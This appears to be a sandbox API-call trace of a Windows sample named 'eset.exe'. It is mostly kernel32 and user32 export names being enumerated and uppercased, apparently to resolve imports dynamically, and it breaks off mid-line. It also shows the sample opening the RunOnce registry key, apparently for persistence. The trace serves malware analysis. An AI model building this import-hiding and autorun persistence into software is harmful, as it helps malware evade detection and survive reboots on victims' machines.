[0092.975] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0092.975] lstrcpyA (in: lpString1=0x49af2a4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0092.975] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0092.975] lstrcpyA (in: lpString1=0x49af2a4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0092.975] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0092.975] lstrcpyA (in: lpString1=0x49af2a4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0092.975] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0092.975] lstrcpyA (in: lpString1=0x49af2a4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0092.975] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0092.975] lstrcpyA (in: lpString1=0x49af2a4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0092.975] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0092.976] lstrcpyA (in: lpString1=0x49af2a4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0092.976] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0092.976] lstrcpyA (in: lpString1=0x49af2a4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0092.976] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0092.976] lstrcpyA (in: lpString1=0x49af2a4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0092.976] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0092.976] lstrcpyA (in: lpString1=0x49af2a4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0092.976] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0092.976] lstrcpyA (in: lpString1=0x49af2a4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0092.976] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0092.976] lstrcpyA (in: lpString1=0x49af2a4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0092.976] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0092.976] lstrcpyA (in: lpString1=0x49af2a4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0092.976] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0092.976] lstrcpyA (in: lpString1=0x49af2a4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0092.976] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0092.976] lstrcpyA (in: lpString1=0x49af2a4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0092.976] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0092.976] lstrcpyA (in: lpString1=0x49af2a4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0092.976] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0092.976] lstrcpyA (in: lpString1=0x49af2a4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0092.976] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0092.976] lstrcpyA (in: lpString1=0x49af2a4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0092.976] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0092.976] lstrcpyA (in: lpString1=0x49af2a4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0092.976] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0092.976] lstrcpyA (in: lpString1=0x49af2a4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0092.976] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0092.976] lstrcpyA (in: lpString1=0x49af2a4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0092.976] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0092.976] lstrcpyA (in: lpString1=0x49af2a4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0092.977] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0092.977] lstrcpyA (in: lpString1=0x49af2a4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0092.977] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0092.977] lstrcpyA (in: lpString1=0x49af2a4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0092.977] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0092.977] lstrcpyA (in: lpString1=0x49af2a4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0092.977] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0092.977] lstrcpyA (in: lpString1=0x49af2a4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0092.977] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0092.977] lstrcpyA (in: lpString1=0x49af2a4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0092.978] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x49aff14, lpdwDisposition=0x0 | out: phkResult=0x49aff14*=0x42c, lpdwDisposition=0x0) returned 0x0 [0092.978] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x190000 [0092.978] GetTickCount () returned 0x114f612 [0092.978] lstrlenW (lpString="1234567890") returned 10 [0092.978] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x1a0000 [0092.978] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x350000 [0092.979] lstrcpyW (in: lpString1=0x350000, lpString2="1234567890" | out: lpString1="1234567890") returned="1234567890" [0092.979] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eset.exe") returned 46 [0092.979] VirtualAlloc (lpAddress=0x0, dwSize=0x7c, flAllocationType=0x3000, flProtect=0x4) returned 0x360000 [0092.979] lstrlenA (lpString="user32.dll") returned 10 [0092.980] GetModuleHandleA (lpModuleName="user32.dll") returned 0x74f40000 [0092.980] lstrcpyA (in: lpString1=0x49af288, lpString2="ActivateKeyboardLayout" | out: lpString1="ActivateKeyboardLayout") returned="ActivateKeyboardLayout" [0092.980] lstrlenA (lpString="ACTIVATEKEYBOARDLAYOUT") returned 22 [0092.980] lstrcpyA (in: lpString1=0x49af288, lpString2="AddClipboardFormatListener" | out: lpString1="AddClipboardFormatListener") returned="AddClipboardFormatListener" [0092.980] lstrlenA (lpString="ADDCLIPBOARDFORMATLISTENER") returned 26 [0092.980] lstrcpyA (in: lpString1=0x49af288, lpString2="AdjustWindowRect" | out: lpString1="AdjustWindowRect") returned="AdjustWindowRect" [0092.980] lstrlenA (lpString="ADJUSTWINDOWRECT") returned 16 [0092.980] lstrcpyA (in: lpString1=0x49af288, lpString2="AdjustWindowRectEx" | out: lpString1="AdjustWindowRectEx") returned="AdjustWindowRectEx" [0092.980] lstrlenA (lpString="ADJUSTWINDOWRECTEX") returned 18 [0092.980] lstrcpyA (in: lpString1=0x49af288, lpString2="AlignRects" | out: lpString1="AlignRects") returned="AlignRects" [0092.980] lstrlenA (lpString="ALIGNRECTS") returned 10 [0092.980] lstrcpyA (in: lpString1=0x49af288, lpString2="AllowForegroundActivation" | out: lpString1="AllowForegroundActivation") returned="AllowForegroundActivation" [0092.980] lstrlenA (lpString="ALLOWFOREGROUNDACTIVATION") returned 25 [0092.980] lstrcpyA (in: lpString1=0x49af288, lpString2="AllowSetForegroundWindow" | out: lpString1="AllowSetForegroundWindow") returned="AllowSetForegroundWindow" [0092.980] lstrlenA (lpString="ALLOWSETFOREGROUNDWINDOW") returned 24 [0092.980] lstrcpyA (in: lpString1=0x49af288, lpString2="AnimateWindow" | out: lpString1="AnimateWindow") returned="AnimateWindow" [0092.980] lstrlenA (lpString="ANIMATEWINDOW") returned 13 [0092.980] lstrcpyA (in: lpString1=0x49af288, lpString2="AnyPopup" | out: lpString1="AnyPopup") returned="AnyPopup" [0092.980] lstrlenA (lpString="ANYPOPUP") returned 8 [0092.980] lstrcpyA (in: lpString1=0x49af288, lpString2="AppendMenuA" | out: lpString1="AppendMenuA") returned="AppendMenuA" [0092.980] lstrlenA (lpString="APPENDMENUA") returned 11 [0092.980] lstrcpyA (in: lpString1=0x49af288, lpString2="AppendMenuW" | out: lpString1="AppendMenuW") returned="AppendMenuW" [0092.980] lstrlenA (lpString="APPENDMENUW") returned 11 [0092.980] lstrcpyA (in: lpString1=0x49af288, lpString2="ArrangeIconicWindows" | out: lpString1="ArrangeIconicWindows") returned="ArrangeIconicWindows" [0092.980] lstrlenA (lpString="ARRANGEICONICWINDOWS") returned 20 [0092.980] lstrcpyA (in: lpString1=0x49af288, lpString2="AttachThreadInput" | out: lpString1="AttachThreadInput") returned="AttachThreadInput" [0092.980] lstrlenA (lpString="ATTACHTHREADINPUT") returned 17 [0092.980] lstrcpyA (in: lpString1=0x49af288, lpString2="BeginDeferWindowPos" | out: lpString1="BeginDeferWindowPos") returned="BeginDeferWindowPos" [0092.980] lstrlenA (lpString="BEGINDEFERWINDOWPOS") returned 19 [0092.980] lstrcpyA (in: lpString1=0x49af288, lpString2="BeginPaint" | out: lpString1="BeginPaint") returned="BeginPaint" [0092.981] lstrlenA (lpString="BEGINPAINT") returned 10 [0092.981] lstrcpyA (in: lpString1=0x49af288, lpString2="BlockInput" | out: lpString1="BlockInput") returned="BlockInput" [0092.981] lstrlenA (lpString="BLOCKINPUT") returned 10 [0092.981] lstrcpyA (in: lpString1=0x49af288, lpString2="BringWindowToTop" | out: lpString1="BringWindowToTop") returned="BringWindowToTop" [0092.981] lstrlenA (lpString="BRINGWINDOWTOTOP") returned 16 [0092.981] lstrcpyA (in: lpString1=0x49af288, lpString2="BroadcastSystemMessage" | out: lpString1="BroadcastSystemMessage") returned="BroadcastSystemMessage" [0092.981] lstrlenA (lpString="BROADCASTSYSTEMMESSAGE") returned 22 [0092.981] lstrcpyA (in: lpString1=0x49af288, lpString2="BroadcastSystemMessageA" | out: lpString1="BroadcastSystemMessageA") returned="BroadcastSystemMessageA" [0092.981] lstrlenA (lpString="BROADCASTSYSTEMMESSAGEA") returned 23 [0092.981] lstrcpyA (in: lpString1=0x49af288, lpString2="BroadcastSystemMessageExA" | out: lpString1="BroadcastSystemMessageExA") returned="BroadcastSystemMessageExA" [0092.981] lstrlenA (lpString="BROADCASTSYSTEMMESSAGEEXA") returned 25 [0092.981] lstrcpyA (in: lpString1=0x49af288, lpString2="BroadcastSystemMessageExW" | out: lpString1="BroadcastSystemMessageExW") returned="BroadcastSystemMessageExW" [0092.981] lstrlenA (lpString="BROADCASTSYSTEMMESSAGEEXW") returned 25 [0092.981] lstrcpyA (in: lpString1=0x49af288, lpString2="BroadcastSystemMessageW" | out: lpString1="BroadcastSystemMessageW") returned="BroadcastSystemMessageW" [0092.981] lstrlenA (lpString="BROADCASTSYSTEMMESSAGEW") returned 23 [0092.981] lstrcpyA (in: lpString1=0x49af288, lpString2="BuildReasonArray" | out: lpString1="BuildReasonArray") returned="BuildReasonArray" [0092.981] lstrlenA (lpString="BUILDREASONARRAY") returned 16 [0092.981] lstrcpyA (in: lpString1=0x49af288, lpString2="CalcMenuBar" | out: lpString1="CalcMenuBar") returned="CalcMenuBar" [0092.981] lstrlenA (lpString="CALCMENUBAR") returned 11 [0092.981] lstrcpyA (in: lpString1=0x49af288, lpString2="CalculatePopupWindowPosition" | out: lpString1="CalculatePopupWindowPosition") returned="CalculatePopupWindowPosition" [0092.981] lstrlenA (lpString="CALCULATEPOPUPWINDOWPOSITION") returned 28 [0092.981] lstrcpyA (in: lpString1=0x49af288, lpString2="CallMsgFilter" | out: lpString1="CallMsgFilter") returned="CallMsgFilter" [0092.981] lstrlenA (lpString="CALLMSGFILTER") returned 13 [0092.981] lstrcpyA (in: lpString1=0x49af288, lpString2="CallMsgFilterA" | out: lpString1="CallMsgFilterA") returned="CallMsgFilterA" [0092.981] lstrlenA (lpString="CALLMSGFILTERA") returned 14 [0092.981] lstrcpyA (in: lpString1=0x49af288, lpString2="CallMsgFilterW" | out: lpString1="CallMsgFilterW") returned="CallMsgFilterW" [0092.981] lstrlenA (lpString="CALLMSGFILTERW") returned 14 [0092.981] lstrcpyA (in: lpString1=0x49af288, lpString2="CallNextHookEx" | out: lpString1="CallNextHookEx") returned="CallNextHookEx" [0092.981] lstrlenA (lpString="CALLNEXTHOOKEX") returned 14 [0092.981] lstrcpyA (in: lpString1=0x49af288, lpString2="CallWindowProcA" | out: lpString1="CallWindowProcA") returned="CallWindowProcA" [0092.981] lstrlenA (lpString="CALLWINDOWPROCA") returned 15 [0092.981] lstrcpyA (in: lpString1=0x49af288, lpString2="CallWindowProcW" | out: lpString1="CallWindowProcW") returned="CallWindowProcW" [0092.982] lstrlenA (lpString="CALLWINDOWPROCW") returned 15 [0092.982] lstrcpyA (in: lpString1=0x49af288, lpString2="CancelShutdown" | out: lpString1="CancelShutdown") returned="CancelShutdown" [0092.982] lstrlenA (lpString="CANCELSHUTDOWN") returned 14 [0092.982] lstrcpyA (in: lpString1=0x49af288, lpString2="CascadeChildWindows" | out: lpString1="CascadeChildWindows") returned="CascadeChildWindows" [0092.982] lstrlenA (lpString="CASCADECHILDWINDOWS") returned 19 [0092.982] lstrcpyA (in: lpString1=0x49af288, lpString2="CascadeWindows" | out: lpString1="CascadeWindows") returned="CascadeWindows" [0092.982] lstrlenA (lpString="CASCADEWINDOWS") returned 14 [0092.982] lstrcpyA (in: lpString1=0x49af288, lpString2="ChangeClipboardChain" | out: lpString1="ChangeClipboardChain") returned="ChangeClipboardChain" [0092.982] lstrlenA (lpString="CHANGECLIPBOARDCHAIN") returned 20 [0092.982] lstrcpyA (in: lpString1=0x49af288, lpString2="ChangeDisplaySettingsA" | out: lpString1="ChangeDisplaySettingsA") returned="ChangeDisplaySettingsA" [0092.982] lstrlenA (lpString="CHANGEDISPLAYSETTINGSA") returned 22 [0092.982] lstrcpyA (in: lpString1=0x49af288, lpString2="ChangeDisplaySettingsExA" | out: lpString1="ChangeDisplaySettingsExA") returned="ChangeDisplaySettingsExA" [0092.982] lstrlenA (lpString="CHANGEDISPLAYSETTINGSEXA") returned 24 [0092.982] lstrcpyA (in: lpString1=0x49af288, lpString2="ChangeDisplaySettingsExW" | out: lpString1="ChangeDisplaySettingsExW") returned="ChangeDisplaySettingsExW" [0092.982] lstrlenA (lpString="CHANGEDISPLAYSETTINGSEXW") returned 24 [0092.982] lstrcpyA (in: lpString1=0x49af288, lpString2="ChangeDisplaySettingsW" | out: lpString1="ChangeDisplaySettingsW") returned="ChangeDisplaySettingsW" [0092.982] lstrlenA (lpString="CHANGEDISPLAYSETTINGSW") returned 22 [0092.982] lstrcpyA (in: lpString1=0x49af288, lpString2="ChangeMenuA" | out: lpString1="ChangeMenuA") returned="ChangeMenuA" [0092.982] lstrlenA (lpString="CHANGEMENUA") returned 11 [0092.982] lstrcpyA (in: lpString1=0x49af288, lpString2="ChangeMenuW" | out: lpString1="ChangeMenuW") returned="ChangeMenuW" [0092.982] lstrlenA (lpString="CHANGEMENUW") returned 11 [0092.982] lstrcpyA (in: lpString1=0x49af288, lpString2="ChangeWindowMessageFilter" | out: lpString1="ChangeWindowMessageFilter") returned="ChangeWindowMessageFilter" [0092.982] lstrlenA (lpString="CHANGEWINDOWMESSAGEFILTER") returned 25 [0092.982] lstrcpyA (in: lpString1=0x49af288, lpString2="ChangeWindowMessageFilterEx" | out: lpString1="ChangeWindowMessageFilterEx") returned="ChangeWindowMessageFilterEx" [0092.982] lstrlenA (lpString="CHANGEWINDOWMESSAGEFILTEREX") returned 27 [0092.982] lstrcpyA (in: lpString1=0x49af288, lpString2="CharLowerA" | out: lpString1="CharLowerA") returned="CharLowerA" [0092.982] lstrlenA (lpString="CHARLOWERA") returned 10 [0092.982] lstrcpyA (in: lpString1=0x49af288, lpString2="CharLowerBuffA" | out: lpString1="CharLowerBuffA") returned="CharLowerBuffA" [0092.982] lstrlenA (lpString="CHARLOWERBUFFA") returned 14 [0092.982] lstrcpyA (in: lpString1=0x49af288, lpString2="CharLowerBuffW" | out: lpString1="CharLowerBuffW") returned="CharLowerBuffW" [0092.982] lstrlenA (lpString="CHARLOWERBUFFW") returned 14 [0092.982] lstrcpyA (in: lpString1=0x49af288, lpString2="CharLowerW" | out: lpString1="CharLowerW") returned="CharLowerW" [0092.982] lstrlenA (lpString="CHARLOWERW") returned 10 [0092.982] lstrcpyA (in: lpString1=0x49af288, lpString2="CharNextA" | out: lpString1="CharNextA") returned="CharNextA" [0092.983] lstrlenA (lpString="CHARNEXTA") returned 9 [0092.983] lstrcpyA (in: lpString1=0x49af288, lpString2="CharNextExA" | out: lpString1="CharNextExA") returned="CharNextExA" [0092.983] lstrlenA (lpString="CHARNEXTEXA") returned 11 [0092.983] lstrcpyA (in: lpString1=0x49af288, lpString2="CharNextW" | out: lpString1="CharNextW") returned="CharNextW" [0092.983] lstrlenA (lpString="CHARNEXTW") returned 9 [0092.983] lstrcpyA (in: lpString1=0x49af288, lpString2="CharPrevA" | out: lpString1="CharPrevA") returned="CharPrevA" [0092.983] lstrlenA (lpString="CHARPREVA") returned 9 [0092.983] lstrcpyA (in: lpString1=0x49af288, lpString2="CharPrevExA" | out: lpString1="CharPrevExA") returned="CharPrevExA" [0092.983] lstrlenA (lpString="CHARPREVEXA") returned 11 [0092.983] lstrcpyA (in: lpString1=0x49af288, lpString2="CharPrevW" | out: lpString1="CharPrevW") returned="CharPrevW" [0092.983] lstrlenA (lpString="CHARPREVW") returned 9 [0092.983] lstrcpyA (in: lpString1=0x49af288, lpString2="CharToOemA" | out: lpString1="CharToOemA") returned="CharToOemA" [0092.983] lstrlenA (lpString="CHARTOOEMA") returned 10 [0092.983] lstrcpyA (in: lpString1=0x49af288, lpString2="CharToOemBuffA" | out: lpString1="CharToOemBuffA") returned="CharToOemBuffA" [0092.983] lstrlenA (lpString="CHARTOOEMBUFFA") returned 14 [0092.983] lstrcpyA (in: lpString1=0x49af288, lpString2="CharToOemBuffW" | out: lpString1="CharToOemBuffW") returned="CharToOemBuffW" [0092.983] lstrlenA (lpString="CHARTOOEMBUFFW") returned 14 [0092.983] lstrcpyA (in: lpString1=0x49af288, lpString2="CharToOemW" | out: lpString1="CharToOemW") returned="CharToOemW" [0092.983] lstrlenA (lpString="CHARTOOEMW") returned 10 [0092.983] lstrcpyA (in: lpString1=0x49af288, lpString2="CharUpperA" | out: lpString1="CharUpperA") returned="CharUpperA" [0092.983] lstrlenA (lpString="CHARUPPERA") returned 10 [0092.983] lstrcpyA (in: lpString1=0x49af288, lpString2="CharUpperBuffA" | out: lpString1="CharUpperBuffA") returned="CharUpperBuffA" [0092.983] lstrlenA (lpString="CHARUPPERBUFFA") returned 14 [0092.983] lstrcpyA (in: lpString1=0x49af288, lpString2="CharUpperBuffW" | out: lpString1="CharUpperBuffW") returned="CharUpperBuffW" [0092.983] lstrlenA (lpString="CHARUPPERBUFFW") returned 14 [0092.983] lstrcpyA (in: lpString1=0x49af288, lpString2="CharUpperW" | out: lpString1="CharUpperW") returned="CharUpperW" [0092.983] lstrlenA (lpString="CHARUPPERW") returned 10 [0092.983] lstrcpyA (in: lpString1=0x49af288, lpString2="CheckDesktopByThreadId" | out: lpString1="CheckDesktopByThreadId") returned="CheckDesktopByThreadId" [0092.983] lstrlenA (lpString="CHECKDESKTOPBYTHREADID") returned 22 [0092.983] lstrcpyA (in: lpString1=0x49af288, lpString2="CheckDlgButton" | out: lpString1="CheckDlgButton") returned="CheckDlgButton" [0092.983] lstrlenA (lpString="CHECKDLGBUTTON") returned 14 [0092.983] lstrcpyA (in: lpString1=0x49af288, lpString2="CheckMenuItem" | out: lpString1="CheckMenuItem") returned="CheckMenuItem" [0092.983] lstrlenA (lpString="CHECKMENUITEM") returned 13 [0092.983] lstrcpyA (in: lpString1=0x49af288, lpString2="CheckMenuRadioItem" | out: lpString1="CheckMenuRadioItem") returned="CheckMenuRadioItem" [0092.984] lstrlenA (lpString="CHECKMENURADIOITEM") returned 18 [0092.984] lstrcpyA (in: lpString1=0x49af288, lpString2="CheckRadioButton" | out: lpString1="CheckRadioButton") returned="CheckRadioButton" [0092.984] lstrlenA (lpString="CHECKRADIOBUTTON") returned 16 [0092.984] lstrcpyA (in: lpString1=0x49af288, lpString2="CheckWindowThreadDesktop" | out: lpString1="CheckWindowThreadDesktop") returned="CheckWindowThreadDesktop" [0092.984] lstrlenA (lpString="CHECKWINDOWTHREADDESKTOP") returned 24 [0092.984] lstrcpyA (in: lpString1=0x49af288, lpString2="ChildWindowFromPoint" | out: lpString1="ChildWindowFromPoint") returned="ChildWindowFromPoint" [0092.984] lstrlenA (lpString="CHILDWINDOWFROMPOINT") returned 20 [0092.984] lstrcpyA (in: lpString1=0x49af288, lpString2="ChildWindowFromPointEx" | out: lpString1="ChildWindowFromPointEx") returned="ChildWindowFromPointEx" [0092.984] lstrlenA (lpString="CHILDWINDOWFROMPOINTEX") returned 22 [0092.984] lstrcpyA (in: lpString1=0x49af288, lpString2="CliImmSetHotKey" | out: lpString1="CliImmSetHotKey") returned="CliImmSetHotKey" [0092.984] lstrlenA (lpString="CLIIMMSETHOTKEY") returned 15 [0092.984] lstrcpyA (in: lpString1=0x49af288, lpString2="ClientThreadSetup" | out: lpString1="ClientThreadSetup") returned="ClientThreadSetup" [0092.984] lstrlenA (lpString="CLIENTTHREADSETUP") returned 17 [0092.984] lstrcpyA (in: lpString1=0x49af288, lpString2="ClientToScreen" | out: lpString1="ClientToScreen") returned="ClientToScreen" [0092.984] lstrlenA (lpString="CLIENTTOSCREEN") returned 14 [0092.984] lstrcpyA (in: lpString1=0x49af288, lpString2="ClipCursor" | out: lpString1="ClipCursor") returned="ClipCursor" [0092.984] lstrlenA (lpString="CLIPCURSOR") returned 10 [0092.984] lstrcpyA (in: lpString1=0x49af288, lpString2="CloseClipboard" | out: lpString1="CloseClipboard") returned="CloseClipboard" [0092.984] lstrlenA (lpString="CLOSECLIPBOARD") returned 14 [0092.984] lstrcpyA (in: lpString1=0x49af288, lpString2="CloseDesktop" | out: lpString1="CloseDesktop") returned="CloseDesktop" [0092.984] lstrlenA (lpString="CLOSEDESKTOP") returned 12 [0092.984] lstrcpyA (in: lpString1=0x49af288, lpString2="CloseGestureInfoHandle" | out: lpString1="CloseGestureInfoHandle") returned="CloseGestureInfoHandle" [0092.984] lstrlenA (lpString="CLOSEGESTUREINFOHANDLE") returned 22 [0092.984] lstrcpyA (in: lpString1=0x49af288, lpString2="CloseTouchInputHandle" | out: lpString1="CloseTouchInputHandle") returned="CloseTouchInputHandle" [0092.984] lstrlenA (lpString="CLOSETOUCHINPUTHANDLE") returned 21 [0092.984] lstrcpyA (in: lpString1=0x49af288, lpString2="CloseWindow" | out: lpString1="CloseWindow") returned="CloseWindow" [0092.984] lstrlenA (lpString="CLOSEWINDOW") returned 11 [0092.984] lstrcpyA (in: lpString1=0x49af288, lpString2="CloseWindowStation" | out: lpString1="CloseWindowStation") returned="CloseWindowStation" [0092.984] lstrlenA (lpString="CLOSEWINDOWSTATION") returned 18 [0092.984] lstrcpyA (in: lpString1=0x49af288, lpString2="ConsoleControl" | out: lpString1="ConsoleControl") returned="ConsoleControl" [0092.984] lstrlenA (lpString="CONSOLECONTROL") returned 14 [0092.984] lstrcpyA (in: lpString1=0x49af288, lpString2="ControlMagnification" | out: lpString1="ControlMagnification") returned="ControlMagnification" [0092.984] lstrlenA (lpString="CONTROLMAGNIFICATION") returned 20 [0092.985] lstrcpyA (in: lpString1=0x49af288, lpString2="CopyAcceleratorTableA" | out: lpString1="CopyAcceleratorTableA") returned="CopyAcceleratorTableA" [0092.985] lstrlenA (lpString="COPYACCELERATORTABLEA") returned 21 [0092.985] lstrcpyA (in: lpString1=0x49af288, lpString2="CopyAcceleratorTableW" | out: lpString1="CopyAcceleratorTableW") returned="CopyAcceleratorTableW" [0092.985] lstrlenA (lpString="COPYACCELERATORTABLEW") returned 21 [0092.985] lstrcpyA (in: lpString1=0x49af288, lpString2="CopyIcon" | out: lpString1="CopyIcon") returned="CopyIcon" [0092.985] lstrlenA (lpString="COPYICON") returned 8 [0092.985] lstrcpyA (in: lpString1=0x49af288, lpString2="CopyImage" | out: lpString1="CopyImage") returned="CopyImage" [0092.985] lstrlenA (lpString="COPYIMAGE") returned 9 [0092.985] lstrcpyA (in: lpString1=0x49af288, lpString2="CopyRect" | out: lpString1="CopyRect") returned="CopyRect" [0092.985] lstrlenA (lpString="COPYRECT") returned 8 [0092.985] lstrcpyA (in: lpString1=0x49af288, lpString2="CountClipboardFormats" | out: lpString1="CountClipboardFormats") returned="CountClipboardFormats" [0092.985] lstrlenA (lpString="COUNTCLIPBOARDFORMATS") returned 21 [0092.985] lstrcpyA (in: lpString1=0x49af288, lpString2="CreateAcceleratorTableA" | out: lpString1="CreateAcceleratorTableA") returned="CreateAcceleratorTableA" [0092.985] lstrlenA (lpString="CREATEACCELERATORTABLEA") returned 23 [0092.985] lstrcpyA (in: lpString1=0x49af288, lpString2="CreateAcceleratorTableW" | out: lpString1="CreateAcceleratorTableW") returned="CreateAcceleratorTableW" [0092.985] lstrlenA (lpString="CREATEACCELERATORTABLEW") returned 23 [0092.985] lstrcpyA (in: lpString1=0x49af288, lpString2="CreateCaret" | out: lpString1="CreateCaret") returned="CreateCaret" [0092.985] lstrlenA (lpString="CREATECARET") returned 11 [0092.985] lstrcpyA (in: lpString1=0x49af288, lpString2="CreateCursor" | out: lpString1="CreateCursor") returned="CreateCursor" [0092.985] lstrlenA (lpString="CREATECURSOR") returned 12 [0092.985] lstrcpyA (in: lpString1=0x49af288, lpString2="CreateDesktopA" | out: lpString1="CreateDesktopA") returned="CreateDesktopA" [0092.985] lstrlenA (lpString="CREATEDESKTOPA") returned 14 [0092.985] lstrcpyA (in: lpString1=0x49af288, lpString2="CreateDesktopExA" | out: lpString1="CreateDesktopExA") returned="CreateDesktopExA" [0092.985] lstrlenA (lpString="CREATEDESKTOPEXA") returned 16 [0092.985] lstrcpyA (in: lpString1=0x49af288, lpString2="CreateDesktopExW" | out: lpString1="CreateDesktopExW") returned="CreateDesktopExW" [0092.985] lstrlenA (lpString="CREATEDESKTOPEXW") returned 16 [0092.985] lstrcpyA (in: lpString1=0x49af288, lpString2="CreateDesktopW" | out: lpString1="CreateDesktopW") returned="CreateDesktopW" [0092.985] lstrlenA (lpString="CREATEDESKTOPW") returned 14 [0092.985] lstrcpyA (in: lpString1=0x49af288, lpString2="CreateDialogIndirectParamA" | out: lpString1="CreateDialogIndirectParamA") returned="CreateDialogIndirectParamA" [0092.985] lstrlenA (lpString="CREATEDIALOGINDIRECTPARAMA") returned 26 [0092.985] lstrcpyA (in: lpString1=0x49af288, lpString2="CreateDialogIndirectParamAorW" | out: lpString1="CreateDialogIndirectParamAorW") returned="CreateDialogIndirectParamAorW" [0092.985] lstrlenA (lpString="CREATEDIALOGINDIRECTPARAMAORW") returned 29 [0092.985] lstrcpyA (in: lpString1=0x49af288, lpString2="CreateDialogIndirectParamW" | out: lpString1="CreateDialogIndirectParamW") returned="CreateDialogIndirectParamW" [0092.985] lstrlenA (lpString="CREATEDIALOGINDIRECTPARAMW") returned 26 [0092.986] lstrcpyA (in: lpString1=0x49af288, lpString2="CreateDialogParamA" | out: lpString1="CreateDialogParamA") returned="CreateDialogParamA" [0092.986] lstrlenA (lpString="CREATEDIALOGPARAMA") returned 18 [0092.986] lstrcpyA (in: lpString1=0x49af288, lpString2="CreateDialogParamW" | out: lpString1="CreateDialogParamW") returned="CreateDialogParamW" [0092.986] lstrlenA (lpString="CREATEDIALOGPARAMW") returned 18 [0092.986] lstrcpyA (in: lpString1=0x49af288, lpString2="CreateIcon" | out: lpString1="CreateIcon") returned="CreateIcon" [0092.986] lstrlenA (lpString="CREATEICON") returned 10 [0092.986] lstrcpyA (in: lpString1=0x49af288, lpString2="CreateIconFromResource" | out: lpString1="CreateIconFromResource") returned="CreateIconFromResource" [0092.986] lstrlenA (lpString="CREATEICONFROMRESOURCE") returned 22 [0092.986] lstrcpyA (in: lpString1=0x49af288, lpString2="CreateIconFromResourceEx" | out: lpString1="CreateIconFromResourceEx") 